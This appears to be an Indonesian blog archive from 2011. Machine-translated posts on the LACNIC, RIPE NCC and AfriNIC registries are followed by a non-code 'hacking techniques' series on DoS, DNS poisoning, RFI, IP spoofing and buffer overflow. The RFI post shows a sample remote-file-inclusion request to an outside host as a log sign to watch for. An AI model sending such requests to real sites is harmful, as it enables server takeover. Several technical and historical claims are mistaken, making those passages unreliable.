Jumat, Februari 25, 2011

Latin American and Caribbean Internet Addresses Registry (LACNIC)

LACNIC adalah Regional Internet Registry untuk Amerika Latin dan Karibia daerah.
LACNIC nomor menyediakan alokasi sumber daya dan layanan registrasi yang mendukung operasi global Internet. Ini adalah bukan untuk mencari keuntungan, organisasi berbasis keanggotaan yang anggotanya termasuk Internet Service Provider, dan organisasi serupa.

LACNIC fungsi utama adalah:

* Mengalokasikan IPv4 dan IPv6 address space, dan Autonomous System Numbers
* Memelihara Database Whois publik untuk Amerika Latin dan Karibia
* Reverse DNS delegasi
* Mewakili kepentingan Amerika Latin dan Karibia komunitas internet di panggung global

Sejarah

Sejak tahun 1993, organisasi-organisasi akademis di Amerika Latin seperti ENRED - Foro de redes de America Latina kamu El Caribe, mendiskusikan kebutuhan register untuk Amerika Latin. Pada tahun 1998 selama pertemuan di Panamá ENRED termasuk NIC-MX, tema ini sedang dibahas dan mereka mengetahui bahwa kelompok lain yang dibentuk oleh organisasi komersial seperti CABASE - Camara Argentina de Base de Datos y Servicio em Línea dan e-COMLAC (Amerika Latin dan Karibia Federasi untuk Internet dan Electronic Commerce), juga mendiskusikan gagasan tentang american latin registri.

Pada tanggal 30 Januari 1998, Ira Magazincr, maka penasihat senior Presiden Clinton untuk pengembangan kebijakan, merilis sebuah makalah diskusi, yang dikenal sebagai "kertas hijau". Sebuah versi revisi yang dikenal sebagai "kertas putih" dirilis pada tanggal 5 Juni. Makalah ini mengusulkan sebuah organisasi baru untuk menangani sumber daya internet. (yang terlambat menjadi ICANN). Setelah rilis ini sejumlah kelompok, konferensi yang diselenggarakan untuk membahas proposal dan membuat saran, di antara mereka, IFWP atau International Forum untuk White Paper.

IFWP diselenggarakan empat pertemuan, yang terakhir di Buenos Aires, di mana beberapa orang Amerika selatan orang dan organisasi dibedakan berpartisipasi dan mulai mengenal satu sama lain. Di antara mereka Messano Oscar, Anthony Harris dan Edmundo Valiente dari CABASE, Fabio Marinho, anggota Comite Gestor de Brasil - Brasil internet Steering Committee dan Presiden ASSESPRO - Associação Brasileira de Empresas de Software Serviços de Informática e Internet, Raimundo Beca-AHCIET - Asosiasi Hispanoamericana de Centros de Investigacion y Empresas de telecomunicaciones, Brasil, México Nic-Oscar Robles dan Jerman Valdez, y Julian Dunayevich, Raul Echeverria. ENRED

Bergabung dengan organisasi-organisasi eCOMLAC - Federación Latino Americana y Caribeña para Internet y el Comercio electrónico, argumented bahwa alamat IP Amerika Latin, dapat ditangani oleh suatu badan lokal dan mencapai kesepakatan untuk penciptaan. Orang lain berpartisipasi dalam diskusi awal ini, di antara Eliezer CADENAS (ENRED), Fidel Vienegas (AHCIET), Raphael Mandarino (CG_B).

Akhirnya kesepakatan untuk penciptaan LACNIC (Amerika Latin dan Karibia IP Address Daerah Registry), ditandatangani di Santiago de Chile pada 22 Agustus 1999 selama pertemuan ICANN yang kedua.

Sebuah Dewan Interim didefinisikan dengan enam anggota:

* AHCIET - Raimundo Beca;
* CABASE - Jorge Plano, kemudian digantikan oleh Oscar Messano;
* CG-Br - José Luis Ribeiro;
* ENRED - Julian Dunayerich; kemudian digantikan oleh Raul Echeverria;
* NIC-Mx - Jerman Valdez;
* ECOMLAC - Fabio Marinho;

Langkah berikutnya, LACNIC ini disampaikan Dewan Sementara pada 26 Agustus 1999, perjanjian ini untuk Esther Dyson, maka Ketua Interim ICANN ICANN Board untuk persetujuan.
Sebuah Rencana Bisnis atau organisasi baru ini dikembangkan dan disajikan kepada ARIN, organisasi yang bertanggung jawab untuk wilayah kami. Anggaran Dasar diciptakan dan diputuskan bahwa akan LACNIC kantor pusat di Montevideo, dengan orang-orang teknis dan peralatan di São Paulo, Brazil NIC di tempat.
LACNIC secara resmi diakui oleh ICANN selama pertemuan Shanghai pada tahun 2002.
LACNIC didirikan pada 2001, dengan kantor administrasi di Montevideo, Uruguay dan fasilitas teknis yang disediakan oleh Comite Gestor da Internet Brasil São Paulo.

The LACNIC terdiri dari:

* Anggota
Anggota dapat langsung mempengaruhi kegiatan LACNIC dan jasa. Anggota bertanggung jawab untuk pencalonan dan pemilihan kandidat dalam Badan Eksekutif LACNIC dan untuk menerima skema pengisian LANIC dan menyetujui LACNIC Laporan Keuangan setiap tahun. Anggota juga memberikan masukan kepada, dan umpan balik, kegiatan yang dilakukan dan layanan yang diberikan oleh LACNIC.
* Executive Board
* LACNIC mencalonkan dan memilih anggota Badan Eksekutif. Dewan terdiri dari enam anggota dan bertanggung jawab untuk menunjuk Directo Eksekutif LACNIC dan untuk situasi keuangan secara keseluruhan LACNIC.
* LACNIC Staf
* Anggota staf melakukan kegiatan LACNIC, memberikan layanan kepada anggotanya dan memberikan dukungan administrasi bagi LACNIC.

Organisasi yang menerima alamat IP dari LACNIC secara otomatis langsung menjadi anggota. Menurut ukuran ruang alamat setiap organisasi mengelola, ada anggota yang berbeda kategori dan tingkatan. Keanggotaan terbuka untuk setiap orang atau organisasi yang berminat; ini berarti bahwa organisasi-organisasi yang tidak langsung menerima alamat IP dari LACNIC juga dapat mengajukan aplikasi keanggotaan.

Hal ini tidak perlu menjadi anggota LACNIC sebelum mengajukan permohonan untuk ruang alamat IP (atau sumber daya lainnya), juga tidak akan berbuat demikian memudahkan untuk mendapatkan mereka.

LACNIC perjanjian kerjasama

Sejak pembentukannya, LACNIC telah mengadopsi kebijakan kerjasama yang aktif berusaha untuk mengkonsolidasikan dirinya sebagai sebuah organisasi, untuk memperkuat keterlibatan dalam pertumbuhan dan pengembangan Internet di wilayah, dan untuk memenuhi tujuan utamanya manajemen sumber daya Internet untuk wilayah Latin Amerika dan Karibia.

Contoh dari hal ini adalah perjanjian yang ditandatangani awal dengan melakukan Gestor Comite Internet NIC Brasil dan Meksiko. Melalui perjanjian pertama adalah mungkin untuk memiliki infrastruktur teknis dan sumber daya manusia yang diperlukan untuk LACNIC pusat operasional di kota São Paulo selama dua tahun pertama keberadaannya. Dalam kasus perjanjian dengan NIC Meksiko, sangat mungkin untuk mengimplementasikan rencana pelatihan LACNIC dengan mengorbankan kata organisasi, melalui bahan dan persiapan penyelenggaraan pertemuan di berbagai negara dari kawasan kita.

Kedua perjanjian memiliki peran yang sangat penting dalam pencapaian LACNIC stabilitas dan kelangsungan hidup selama tahap-tahap awal.

Demikian pula, kami percaya bahwa dengan menghasilkan berbagai kesepakatan kerjasama dan kegiatan LACNIC dapat membuat kontribusi yang signifikan bagi penguatan lembaga serta pertumbuhan dan perkembangan komunitas internet di kawasan ini.

LACNIC's partisipasi dalam setiap perjanjian adalah bervariasi dan tergantung pada kemampuan yang tersedia di masing-masing kasus, tetapi maksudnya adalah selalu untuk melengkapi sumber daya dan tindakan setiap organisasi. Untuk alasan ini, dalam beberapa kasus berpartisipasi dengan menggunakan dana sendiri atau memperoleh dana dari luar daerah, dalam orang lain dengan memfasilitasi pelembagaan organisasi regional, mengintegrasikan dan co-organisasi yang berpartisipasi dalam forum dan aktivitas lainnya serta mendukung penelitian pada isu-isu strategis.

Jadi, meskipun tidak peran utamanya, LACNIC memberikan kontribusi untuk pertumbuhan dan evolusi komunitas Internet regional, meningkatkan kehadiran internasionalnya dan relevansi, mengakibatkan tingkat keterlibatan yang lebih besar dan berpengaruh pada definisi kebijakan dan pengelolaan sumber daya global di jaringan tingkat internasional.

* NIC-BR - LACNIC Perjanjian
* NIC-MX - LACNIC Perjanjian
* CLARA - LACNIC Perjanjian Kerjasama
* ECOM-LAC - LACNIC Perjanjian Kerjasama
* LACTLD - LACNIC Perjanjian Kerjasama
* ICA-IDRC - LACNIC Agreement (Frida Program)
* ISC - LACNIC Perjanjian (Proyek + RAICES)
* ORT University - LACNIC Perjanjian
* Universitas Republik (Fakultas Teknik) - Perjanjian LACNIC
* Exchange Program dengan RIR lain
* Dukungan dan Partisipasi di Daerah Acara dan Forum lain

The Number Resource Organization

Dengan RIR lain, LACNIC adalah anggota dari Number Resource Organization (NRO), yang ada untuk melindungi sumber daya nomor belum dialokasikan renang, untuk mempromosikan dan melindungi bottom-up proses pengembangan kebijakan, dan menjadi titik fokus input ke dalam sistem RIR.

Kamis, Februari 24, 2011

Reseaux Ip Europeens Network Control Center ( RIPE NCC )

RIPE NCC adalah Regional Internet Registry (RIR) untuk Eropa, Timur Tengah dan bagian-bagian dari Asia Tengah. Ini bermarkas di Amsterdam, Belanda.
Sebuah RIR mengawasi alokasi dan pendaftaran nomor Internet sumber daya (alamat IPv4, alamat IPv6 dan Autonomous System (AS) Bilangan) di wilayah tertentu.
RIPE NCC yang mendukung koordinasi teknis dan administratif infrastruktur Internet. Ini adalah tidak-untuk-keuntungan keanggotaan organisasi dengan lebih dari 6.000 (per Januari 2009) anggota yang terletak di lebih dari 70 negara di wilayah layanan.
Setiap individu atau organisasi yang dapat menjadi anggota RIPE NCC. Keanggotaan terdiri dari Internet Service Provider (ISP), telekomunikasi organisasi, lembaga pendidikan, pemerintah, regulator dan perusahaan besar.
RIPE NCC yang juga menyediakan dukungan teknis dan administratif untuk Réseaux IP Européens (RIPE), sebuah forum terbuka untuk semua pihak yang berkepentingan dengan pengembangan teknis Internet.

Sejarah

The RIPE NCC memulai operasinya pada April 1992 di Amsterdam, Belanda. Dana awal disediakan oleh jaringan akademis Réseaux Associés pour la Recherche Européenne (RARE) orang anggota, EARN dan EUnet. RIPE NCC yang resmi didirikan ketika versi Belanda Anggaran Dasar diendapkan dengan Amsterdam Chamber of Commerce pada tanggal 12 November 1997. RIPE NCC pertama Rencana Kegiatan diterbitkan pada Mei 1991.

Kegiatan

RIPE NCC yang mendukung perkembangan internet melalui koordinasi teknis infrastruktur Internet di wilayah layanan dan sekitarnya. Itu melakukan banyak kegiatan di daerah ini, termasuk:

* Alokasi dan pencatatan sumber daya nomor Internet (IP Addresses dan AS Bilangan)
* Pembangunan, pengoperasian dan pemeliharaan RIPE Database
* Pembangunan, pengoperasian dan pemeliharaan RIPE Routing Registry
* Operasi K-akar, salah satu akar dunia nameserver
* Koordinasi dukungan untuk delegasi ENUM
* Pengumpulan dan publikasi statistik pada Internet netral perkembangan dan kinerja

RIPE NCC yang terdiri dari:

* Anggota
Anggota dapat langsung mempengaruhi kegiatan RIPE NCC dan jasa. Anggota bertanggung jawab untuk pencalonan dan pemilihan kandidat dalam RIPE NCC Badan Eksekutif dan untuk menerima RIPE NCC Pengisian Skema dan RIPE NCC menyetujui Laporan Keuangan setiap tahun. Anggota juga memberikan masukan kepada, dan umpan balik, kegiatan yang dilakukan dan layanan yang diberikan oleh RIPE NCC.
* Executive Board
* RIPE NCC mencalonkan dan memilih anggota Badan Eksekutif. Dewan terdiri dari antara tiga dan lima anggota dan bertanggung jawab untuk menunjuk RIPE NCC Direktur Pelaksana, untuk situasi keuangan secara keseluruhan dari RIPE NCC dan untuk membuat catatan yang memungkinkan situasi keuangan organisasi yang akan dievaluasi setiap saat.
* RIPE NCC Staf
Anggota staf melakukan kegiatan RIPE NCC, memberikan layanan kepada anggotanya dan memberikan dukungan administrasi bagi RIPE.

RIPE NCC dan RIPE

Réseaux IP Européens adalah suatu forum terbuka untuk semua pihak yang berkepentingan dengan pengembangan teknis Internet. Meskipun nama mirip, RIPE dan RIPE NCC adalah entitas yang terpisah. Namun, mereka sangat saling tergantung. RIPE NCC yang memberikan dukungan administratif untuk RIPE, seperti Rapat RIPE fasilitasi dan memberikan dukungan administratif untuk RIPE Kelompok Kerja.

Biaya

Sumber daya nomor internet tidak memiliki nilai moneter. RIPE NCC para anggota pungutan biaya keanggotaan tahunan yang didasarkan pada sumber daya internet yang menerima anggota dari RIPE NCC. Biaya keanggotaan tahunan yang dikenakan kepada setiap anggota secara proporsional terkait dengan beban kerja yang terlibat dalam menyediakan sumber daya yang diminta oleh anggota.

The RIPE Database

The RIPE Database adalah database publik yang berisi rincian pendaftaran alamat IP dan AS Bilangan awalnya dialokasikan kepada anggota oleh RIPE NCC. Hal ini menunjukkan organisasi atau individu yang saat ini terus yang nomor internet sumber daya, ketika alokasi ini dibuat dan rincian kontak. Organisasi atau individu yang memegang sumber daya ini bertanggung jawab untuk memperbarui informasi dalam database.

Pada Maret 2008, isi database yang tersedia untuk mendekati real-time mirroring (NRTM).
RIPE Routing Registry

The RIPE Routing Registry (RR) adalah sub-set RIPE Database dan menyimpan informasi routing RPSL. RIPE RR yang merupakan bagian dari Internet RR, koleksi database yang cermin satu sama lain. Informasi tentang nama domain dalam RIPE Database adalah untuk referensi saja: itu bukan nama domain registry yang dijalankan oleh kode negara Top Level Domain (ccTLD) administrator dari Eropa dan daerah sekitarnya.

Daerah layanan

RIPE NCC di wilayah pelayanan terdiri dari negara-negara di Eropa, Timur Tengah dan bagian-bagian dari Asia Tengah. RIPE NCC layanan yang tersedia untuk pengguna di luar wilayah ini melalui Local Internet Registries; badan-badan tersebut harus memiliki alamat hukum yang berlaku di dalam wilayah layanan, tetapi dapat menawarkan jasa mereka kepada siapa pun (Daftar Negara-negara Anggota).

Asia

* Southwest Asia
* o Armenia
o Azerbaijan
o Bahrain
o Siprus
o Georgia
o Iran
o Irak
o israel
o Yordania
* o Lebanon
o Oman
o Otoritas Palestina
o Qatar
o Arab Saudi
o Suriah
o Turki
o Uni Emirat Arab
o Yaman
* Central Asia
o Kazakhstan
o Kyrgyzstan
o Tajikistan
o Turkmenistan
o Uzbekistan
* North Asia
o Rusia
Eropa
* Albania
* Andorra
* Austria
* Belarus
* Belgia
* Bosnia-Herzegovina
* Bulgaria
* Kroasia
* Republik Ceko
* Denmark
* Estonia
* Finlandia
* Perancis
* Jerman
* Gibraltar (Britania Raya)
* Yunani
* Hungaria
* Islandia
* Irlandia
* Italia
* Latvia
* Liechtenstein
* Lithuania
* Luxembourg
* Macedonia
* Malta
* Moldova
* Monako
* Montenegro
* Norwegia
* Belanda
* Polandia
* Portugal
* Romania
* Rusia
* San Marino
* Serbia
* Slovakia
* Slovenia
* Spanyol
* Swedia
* Swiss
* Turki
* Ukraina
* Inggris
* Vatikan
* Yugoslavia

Amerika Utara
* Greenland (denmark)

Mantan daerah layanan

Sebelum pembentukan AfriNIC, RIPE NCC melayani negara-negara berikut:

Africa

* Afrika Utara
o Aljazair
o Mesir
o Libya
o Mauritania
o Maroko
o Sudan
o Tunisia
o Sahara Barat
* Afrika Tengah
o Kamerun
o Republik Afrika Tengah
o Chad
o Guinea Khatulistiwa
o Gabon
o São Tomé dan Príncipe
* Afrika Timur
o Djibouti
o Eritrea
o Ethiopia
o Kenya
o Uganda
o Somalia
* Afrika Barat
o Benin
o Burkina Faso
o Tanjung Verde
o Pantai Gading
o Gambia
o Ghana
o Guinea
o Guinea-Bissau
o Liberia
o Mali
o Niger
o nigeria
o Senegal
o Sierra Leone
o Togo

Organisasi terkait dan kegiatan

* The Internet Corporation for Assigned Names and Numbers (ICANN)
ICANN menetapkan blok sumber daya Internet (IP Sumber dan AS Bilangan) ke RIPE NCC dan RIR lainnya.

* The Number Resource Organization (NRO)
The Number Resource Organization (NRO) terdiri dari lima RIR: AfriNIC, APNIC, ARIN, LACNIC, dan RIPE NCC. NRO melaksanakan kegiatan bersama RIR termasuk bersama proyek-proyek teknis, kegiatan penghubung dan koordinasi kebijakan.

* Organisasi Pendukung Alamat (ASO)
NRO juga melaksanakan fungsi ASO, salah satu organisasi pendukung diminta oleh peraturan ICANN. The ASO tinjauan dan mengembangkan rekomendasi tentang Kebijakan internet yang berkaitan dengan sistem IP yang menangani dan menyarankan ICANN Dewan tentang hal ini.

* World Summit di Masyarakat Informasi (WSIS)
Sebagai bagian dari NRO, yang RIPE NCC secara aktif terlibat dalam WSIS.

* Internet Governance Forum (IGF)
Sebagai bagian dari NRO, yang RIPE NCC secara aktif terlibat dalam IGF.

AfriNIC (African Network Information Center)

AfriNIC (African Network Information Center) adalah Regional Internet Registry (RIR) untuk Afrika.
AfriNIC, yang berkantor pusat di Ebene City, Mauritius, untuk sementara diakui oleh ICANN pada 11 Oktober 2004 dan menjadi fungsional operasional pada 22 Februari 2005. Itu diakui oleh ICANN pada bulan April 2005. Sebelumnya, alamat IP untuk Afrika didistribusikan oleh APNIC, ARIN, dan RIPE NCC.
AfriNIC telah dialokasikan alamat IPv4 blok 41.0.0.0 / 8, 196.0.0.0 / 8 dan 197.0.0.0 / 8 dan IPv6 blok 2c00:: / 12 dan 2001:4200:: / 23. Adiel AKPLOGAN, sebuah Togo Nasional, adalah CEO registri.

Negara-negara di wilayah layanan AfriNIC adalah :

* Aljazair
* Angola
* Benin
* Botswana
* Burkina Faso
* Burundi
* Republik Kongo
* Kamerun
* Cape Verde
* Republik Afrika Tengah
* Chad
* Komoro
* Republik Demokratik Kongo
* Pantai Gading
* Djibouti
* Mesir
* Equatorial Guinea
* Eritrea
* Ethiopia
* Gabon
* Gambia
* Ghana
* Guinea
* Guinea-Bissau
* Kenya
* Lesotho
* Liberia
* Libya
* Madagaskar
* Malawi
* Mali
* Mauritania
* Mauritius
* Mayotte
* Maroko
* Mozambik
* Namibia
* Niger
* Nigeria
* Reunion Island
* Rwanda
* Sao Tome dan Principe
* Senegal
* Seychelles
* Sierra Leone
* Somaliland
* South Africa
* Sudan
* Swaziland
* Tanzania
* Togo
* Tunisia
* Uganda
* Sahara Barat
* Zambia
* Zimbabwe

Buffer Overflow ( teknik hacking jilid 5 )

Asslamu alaikum....

sebagai teknik hacking jilid terakhir saya akan menjelaskan sedikit tentang Buffer Overflow.Buffer Overflow merupakan turunan dari serangan Denial of Service ( DoS) namun dikarenakan memiliki banyak turunan istilah, maka Buffer overflow juga salah satu teknik utama teknik hacking.

Mari kita bahas lebih, monggo.....

Buffer Overflow

Pengertian


Buffer overflow adalah sebuah kelemahan yang mudah untuk ditemukan dan dimanfaatkan oleh hacker dalam sebuah sistem. Aplikasi dan Operating System (OS) menyimpan untuk sementara perintah yang mereka dapat di memori tertentu yang biasa disebut buffer memory. Kalau OS atau program tidak bisa dikode secara sempurna maka hacker bisa membuat komputer korban jadi terganggu dengan mengirimkan perintah yang dibuat khusus yang membuat gangguan jadi berlangsung lebih lama. Windows 95 paling rentan kalau sudah berhadapan dengan serangan seperti buffer overflow yang banyak dilancarkan lewat internet ini.Saat ini serangan serupa sudah jarang dilancarkan pada sebuah komputer. Namun terkadang hacker masih sering melakukannya untuk memperlambat kinerja sebuah situs.

Beberapa serangan umum dari Buffer Overflow


Beberapa serangan yang biasa dilakukan dengan teknik Buffer Overflow antara lain :

a. Buffer overruns pada kebanyakan Web server
Webserver Apache dan IIS memiliki celah keamanan. Worm seperti Code Red (untuk IIS) dan Linux. Slapper (untuk Apache) menjadikan celah keamanan yang lebar.

b. DNS overflow
Beberapa server DNS (BIND) sebelumnya tergolong rentan terhadap overflow. Suatu serangan yang akan memberikan nama DNS sangat panjang. Nama DNS dibatasi hingga 64-byte per subkomponen dan 256 byte secara keseluruhan.

c. Serangan DNS
Server DNS biasanya dijalankan pada mode ‘Trust’ oleh service dan user – maksudnya bahwa server DNS dapat dikompromikan agar melancarkan serangan lebih jauh pada user dan service lainnya. Hal ini menjadikan server DNS merupakan target utama serangan para hacker.

d. Mengelabui cache DNS
Serangan yang umum terhadap server DNS. Sederhananya, bekerja dengan mengirimkan suatu pertanyaan untuk meminta domain yang sesungguhnya (“siapakah www.test.com ini?) dan akan disediakan jawaban yang tentu saja salah (“www.test.com adalah 127.0.01″).

IP Spoofing ( teknik hacking jilid 4 )

Assalamu alaikum.....

mari kita lanjutkan pembahasan tentang teknik hacking, monggo disimak.....

IP Spoofing

Pengertian

IP spoofing adalah sejumlah serangan yang menggunakan perubahan sumber IP Address. Protokol TCP/IP tidak memiliki cara untuk memeriksa apakah sumber IP address dalam paket header benar-benar milik mesin yang mengirimkannya.

a. SMURF Attack
Suatu Broadcast ping yang terkirim dan sumber IP dari ping terlihat sama dengan IP address korban. Dalam kasus ini sejmlah besar komputer akan merespon balik dan mengirim suatu Ping reply ke korban. Kejadiannya terus berulang-kali, hingga mesin korban atau link mengalami overload dan dalam kondisi Denial of Service.

b. Prediksi jumlah rangkaian TCP
Suatu koneksi TCP yang ditandai dengan suatu jumlah rangkaian client dan server. Jika jumlah rangkaian tersebut dapat ditebak, para hacker dapat membuat packet dengan memalsukan IP address dan menebak urutan jumlah untuk melakukan hijack koneksi TCP.

c. Prediksi rangkaian melalui pemalsuan DNS
Server DNS biasanya mengquery server DNS lain untuk mengetahui nama host yang lain. Seorang hacker akan mengirimkan suatu request ke server DNS target seolah-olah seperti respon ke server yang sama. Dengan cara ini para hacker dapat membuat client yang mengakses, misalnya situs www.hotmail.com ke server milik sang hacker.


Sumber "http://volkshymne.blogspot.com"

terima kasih sudah membaca......

( RFI ) Remote File Inclusion ( Teknik hacking jilid 3 )

Assalamu alaikum.....


Mari kita lanjutkan teknik hacking yaitu RFI.Lalu apa itu RFI? ayo kita bahas bersama.....


Remote File Inclusion ( RFI )

pengertian

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion
biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi.


Resiko yang dihadapi

File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya(Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, dll..)
5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan DDoS.


Hal-hal yang perlu diketahui untuk menghindari serangan RFI

Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga,
karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.


DNS Cache Poisoning (Teknik Hacking jilid 2 )

Assalamu alaikum.....
Oke kita lanjutkan teknik hacking kedua yaitu DNS Cache Poisoning.Yang belum baca jilid pertama saya akan menjelaskan kembali.

Teknik hacking sendiri memiliki banyak istilah dan penamaan tergantung apa yang akan di-hack.Namun dasar istilah dari teknik hacking adalah :
  • Serangan DoS (Denial of Service)
  • DNS cache Poisoning
  • IP Spoofing
  • Remote File Inclusion (RFI)
  • Buffer Overflow

oke sekarang kita bahas DNS Cache Poisoning, monggo.....

DNS Cache Poisoning

Pengertian

DNS Cache Poisoning merupakan sebuah cara untuk menembus pertahanan dengan cara menyampaikan informasi IP Address yang salah mengenai sebuah host, dengan tujuan untuk mengalihkan lalu lintas paket data dari tujuan yang sebenarnya. Cara ini banyak dipakai untuk menyerang situs-situs e-commerce dan banking yang saat ini bisa dilakukan dengan cara online dengan pengamanan Token. Teknik ini dapat membuat sebuah server palsu tampil identik dengan dengan server online banking yang asli. Oleh karena itu diperlukan digital cerficate untuk mengamankannya, agar server palsu tidak dapat menangkap data otentifikasi dari nasabah yang mengaksesnya. Jadi dapat disimpulkan cara kerja DNS (Domain Name System) poisoning ini adalah dengan mengacaukan DNS Server asli agar pengguna Internet terkelabui untuk mengakses web site palsu yang dibuat benar-benar menyerupai aslinya tersebut, agar data dapat masuk ke server palsu.

Sejarah

DNS Poisoning sendiri dahulu pertama kali ditunjukkan tahun 1997 oleh Eugene Kashpureff dengan cara mengalihkan request ke host InterNIC menuju ke situs pendaftaran domain name alternatif, AlterNIC. Request berhasil dialihkan dengan cara mengeksploitasi vulnerability pada DNS Service. Pada waktu Name Server menerima jawaban DNS Query, sumber jawaban ini membiarkan informasi yang tidak ditanyakan. Dengan begitu Kashpureff dapat memasukkan informasi DNS palsu pada jawaban yang sebenarnya tersebut. Name server yang menerima jawaban tersebut akan langsung menerima jawaban tersebut dan menyimpan informasi apapun yang didapatkannya dalam cache-nya. Hal ini mengakibatkan apabila user mencoba me-resolve suatu host dalam domain InterNIC, maka ia akan menerima informasi IP Address dari AlterNIC. Dengan kata lain ia sudah dialihkan ke alamat palsu.



DoS dan DDoS (teknik hacking jilid 1)

Assalamu alaikum.....

kali ini saya akan menjelaskan teknik hacking di internet.Tapi yang perlu diketahui sekalian bahwa hacker bukanlah para kriminal.Pengertian hacker sendiri adalah orang ahli dalam masalah sistem keamanan jaringan jadi bukan berarti "hacker" adalah "kriminal".

Teknik hacking sendiri memiliki banyak istilah dan penamaan tergantung apa yang akan di-hack.Namun dasar istilah dari teknik hacking adalah :
  • Serangan DoS (Denial of Service)
  • DNS cache Poisoning
  • IP Spoofing
  • Remote File Inclusion (RFI)
  • Buffer Overflow
baiklah kita akan membahas terlebih dahulu apa itu DoS dan DDoS, monggo......


DoS dan DDoS

DoS
Serangan DoS (bahasa Inggris: denial-of-service attacks') adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:

* Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
* Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
* Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.



DDoS
Penolakan Layanan secara Terdistribusi (bahasa Inggris: Distributed Denial of Service (DDos)) adalah salah satu jenis serangan Denial of Service yang menggunakan banyak host penyerang (baik itu menggunakan komputer yang didedikasikan untuk melakukan penyerangan atau komputer yang "dipaksa" menjadi zombie) untuk menyerang satu buah host target dalam sebuah jaringan.

Serangan Denial of Service klasik bersifat "satu lawan satu", sehingga dibutuhkan sebuah host yang kuat (baik itu dari kekuatan pemrosesan atau sistem operasinya) demi membanjiri lalu lintas host target sehingga mencegah klien yang valid untuk mengakses layanan jaringan pada server yang dijadikan target serangan. Serangan DDoS ini menggunakan teknik yang lebih canggih dibandingkan dengan serangan Denial of Service yang klasik, yakni dengan meningkatkan serangan beberapa kali dengan menggunakan beberapa buah komputer sekaligus, sehingga dapat mengakibatkan server atau keseluruhan segmen jaringan dapat menjadi "tidak berguna sama sekali" bagi klien.

